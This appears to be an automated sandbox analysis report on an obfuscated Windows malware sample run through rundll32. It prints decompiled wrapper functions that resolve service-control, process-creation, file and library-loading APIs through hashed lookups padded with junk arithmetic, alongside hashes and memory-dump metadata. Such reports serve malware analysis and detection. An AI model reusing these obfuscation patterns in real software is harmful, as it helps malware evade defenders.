                                              0x002a5fcb
                                              0x002a5fd7
                                              0x002a5fde
                                              0x002a5fe5
                                              0x002a5ffc
                                              0x002a5fff
                                              0x002a6006
                                              0x002a600d
                                              0x002a601a
                                              0x002a6025
                                              0x002a602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 002A6025
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 07bc0c155b8d99f6417d807771814c382b6b73a17356d2f2300d5d66583be093
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: F9F04FB0C11208FFDB08DFA0E94689EBFB8EB40340F208198E509A7260E7715F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 2916 Parent PID: 2468 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 006C2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E006C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006C602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E006D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x006c295f
                                              0x006c2964
                                              0x006c2967
                                              0x006c296a
                                              0x006c296d
                                              0x006c296e
                                              0x006c296f
                                              0x006c2977
                                              0x006c2985
                                              0x006c298a
                                              0x006c2992
                                              0x006c299a
                                              0x006c29a2
                                              0x006c29a9
                                              0x006c29b0
                                              0x006c29b7
                                              0x006c29bb
                                              0x006c29cf
                                              0x006c29dc
                                              0x006c29e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006C29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 0d90814f6e3e98dddc946965e93f2e1c0a25011b10019f6726629396f8a684e9
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 6A016D72A00108BFEB14DF95DC0A9DFBFB6EF44310F108089F508A6250D7B69F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006CC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E006CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006C602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E006D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x006cc6e1
                                              0x006cc6e6
                                              0x006cc6f0
                                              0x006cc6fc
                                              0x006cc703
                                              0x006cc706
                                              0x006cc70d
                                              0x006cc711
                                              0x006cc715
                                              0x006cc71c
                                              0x006cc723
                                              0x006cc72a
                                              0x006cc731
                                              0x006cc738
                                              0x006cc751
                                              0x006cc762
                                              0x006cc768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006CC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 7e0c757dfb255f1e9486b82fffa48cea1d3adc185dba1f33bdcace53b76a2b62
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 391133B290122DBBCB25DF94DD498EFBFB9EF04714F108188F90966210D3B14B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E006C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006C602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E006D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x006c1006
                                              0x006c1009
                                              0x006c100c
                                              0x006c1011
                                              0x006c1016
                                              0x006c101d
                                              0x006c1026
                                              0x006c102d
                                              0x006c1034
                                              0x006c103b
                                              0x006c1047
                                              0x006c104f
                                              0x006c1057
                                              0x006c105e
                                              0x006c1065
                                              0x006c106c
                                              0x006c1073
                                              0x006c1077
                                              0x006c108b
                                              0x006c1096
                                              0x006c109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 006C1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 595082948c127377ca9c24a2aaf2efaa831d8029a0979ed7cd247bea10029107
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: C2015BB6D01309BBEF44DF94C94AADEBBB1EB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E006C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E006D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x006c485e
                                              0x006c487a
                                              0x006c487d
                                              0x006c4884
                                              0x006c488b
                                              0x006c4892
                                              0x006c489d
                                              0x006c48a0
                                              0x006c48ad
                                              0x006c48b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 006C48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: f977ee72c49a2ce788bd0dd8ccf2a57d70dd6a84fe47d661be0c35e563bf7402
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 66F01D70D05209FBDB44CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E006D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E006D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x006d4f80
                                              0x006d4f81
                                              0x006d4f82
                                              0x006d4f86
                                              0x006d4f87
                                              0x006d4f8c
                                              0x006d4fa5
                                              0x006d4fa8
                                              0x006d4faf
                                              0x006d4fb6
                                              0x006d4fc7
                                              0x006d4fca
                                              0x006d4fd7
                                              0x006d4fe2
                                              0x006d4fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 006D4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: dc35befc03082ea648cf0aa4494a33d20af433371597595b82786401f99a50a2
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 3BF037B0C1120CFFEB04DFA4DA4689EBFBAEB40300F20819DE808BB250D3715B509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006D976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E006D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E006D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x006d9772
                                              0x006d9773
                                              0x006d9778
                                              0x006d977a
                                              0x006d977b
                                              0x006d977e
                                              0x006d977f
                                              0x006d9782
                                              0x006d9785
                                              0x006d9788
                                              0x006d9789
                                              0x006d978c
                                              0x006d978f
                                              0x006d9790
                                              0x006d9791
                                              0x006d9794
                                              0x006d9797
                                              0x006d979a
                                              0x006d979d
                                              0x006d97a0
                                              0x006d97a3
                                              0x006d97a6
                                              0x006d97a7
                                              0x006d97a8
                                              0x006d97ad
                                              0x006d97b7
                                              0x006d97c3
                                              0x006d97ca
                                              0x006d97d1
                                              0x006d97d8
                                              0x006d97df
                                              0x006d97e3
                                              0x006d97fc
                                              0x006d9816
                                              0x006d981d

                                              APIs
                                              • CreateProcessW.KERNEL32(006C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006C591A), ref: 006D9816
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 3f8e90123bad8e9db8c238fbfb71a36c04cb31a8b2b8d6f9f018623c35058772
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 3011D372900148BBDF599F92DC0ACDF7F3AEF89750F104048FA1456120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006CB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E006CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E006D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x006cb569
                                              0x006cb56a
                                              0x006cb56d
                                              0x006cb572
                                              0x006cb574
                                              0x006cb577
                                              0x006cb57a
                                              0x006cb57d
                                              0x006cb580
                                              0x006cb583
                                              0x006cb586
                                              0x006cb587
                                              0x006cb58a
                                              0x006cb58d
                                              0x006cb590
                                              0x006cb593
                                              0x006cb594
                                              0x006cb595
                                              0x006cb59a
                                              0x006cb5a4
                                              0x006cb5b8
                                              0x006cb5c0
                                              0x006cb5c4
                                              0x006cb5cb
                                              0x006cb5d2
                                              0x006cb5d9
                                              0x006cb5e6
                                              0x006cb5fd
                                              0x006cb604

                                              APIs
                                              • CreateFileW.KERNELBASE(006D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006D0668,?,?,?,?), ref: 006CB5FD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 4dfd29d2e95c8a81270e188d170eef02627936aac4c261a76deba25f80d2271c
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 8E11C372801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006D981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E006D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E006D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x006d9821
                                              0x006d9822
                                              0x006d9825
                                              0x006d9828
                                              0x006d982a
                                              0x006d982c
                                              0x006d982f
                                              0x006d9832
                                              0x006d9835
                                              0x006d9836
                                              0x006d9837
                                              0x006d983c
                                              0x006d9855
                                              0x006d9858
                                              0x006d985f
                                              0x006d9866
                                              0x006d986d
                                              0x006d9874
                                              0x006d987b
                                              0x006d988e
                                              0x006d989b
                                              0x006d98a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006C87F2,0000CAAE,0000510C,AD82F196), ref: 006D989B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: bd96d7fd845bcf9acbec375f88614873cfd5b079acd079bb1ab1d14eab653b18
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 98019A72801208FBDB04EFD5D846CDFBF79EF85310F10818DF908A6220E6719B219BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E006D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E006D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x006d7bf7
                                              0x006d7bf8
                                              0x006d7bfa
                                              0x006d7bfd
                                              0x006d7bff
                                              0x006d7c02
                                              0x006d7c06
                                              0x006d7c07
                                              0x006d7c0f
                                              0x006d7c1d
                                              0x006d7c25
                                              0x006d7c2d
                                              0x006d7c31
                                              0x006d7c38
                                              0x006d7c3f
                                              0x006d7c46
                                              0x006d7c4a
                                              0x006d7c5e
                                              0x006d7c67
                                              0x006d7c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006D7C67
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 265b839422b40c41ae9c4a18b9b8809066ca68da7193d2a8cd01760036c7e771
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: BC014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819DF40567240E6B15F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006CF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E006CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E006D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x006cf662
                                              0x006cf663
                                              0x006cf665
                                              0x006cf668
                                              0x006cf66a
                                              0x006cf66d
                                              0x006cf670
                                              0x006cf673
                                              0x006cf677
                                              0x006cf678
                                              0x006cf67d
                                              0x006cf687
                                              0x006cf693
                                              0x006cf69a
                                              0x006cf6a1
                                              0x006cf6a5
                                              0x006cf6a9
                                              0x006cf6b0
                                              0x006cf6c9
                                              0x006cf6d8
                                              0x006cf6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006CF6D8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: e5ce28f777ee97fcbb0f40c328e02666741496e654b79fdf1bfef53b5c485528
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 2201E5B6901208BBEF059F94DD0A8DF7F75EB05324F148188F90466250D6B25E21DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E006CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E006C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E006D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x006cb6f3
                                              0x006cb6f8
                                              0x006cb702
                                              0x006cb70b
                                              0x006cb712
                                              0x006cb719
                                              0x006cb720
                                              0x006cb727
                                              0x006cb72e
                                              0x006cb747
                                              0x006cb759
                                              0x006cb75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006CB759
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: b12ae957d101f7aa69163a32ec028809930ad8a978d3accd7e31397482b4cded
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: A6014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E209B55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

